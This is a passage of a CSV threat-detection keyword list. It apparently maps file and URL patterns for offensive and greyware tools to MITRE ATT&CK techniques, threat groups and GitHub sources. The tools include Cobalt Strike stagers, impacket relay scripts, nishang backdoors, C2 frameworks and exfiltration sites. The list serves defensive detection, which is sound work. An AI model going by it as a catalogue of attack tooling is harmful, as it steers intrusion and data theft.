security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_stager_client_header*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_server_append*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_server_header*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_server_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_uri_x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 
- T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http_stager_uri_x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*http1.x64.bin*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*http1.x64.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*HTTPAES256Handler.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*httpattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*httpattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*httpattack.py*,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*httpattack.py*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*httpattacks/*.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*HTTP-Backdoor.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*http-c2_test.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*HttpEvilClippyController*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*HTTP-Login.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,HTTP-Login.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*httpntlm.go*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*httpntlm.old*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*httppayload.bin*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*HttpProxyScan_Log4J2.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of 
Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*http-redwarden*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*httprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*httprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*httprelayserver.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*httprelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*http-request-smuggler-all.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*https://*.*.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*.brs.devtunnels.ms/*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*.euw.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*.screenconnect.com/Bin/*.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*https://*.sendspace.com/upload*,greyware_tool_keyword,sendspace.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://*.use.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. 
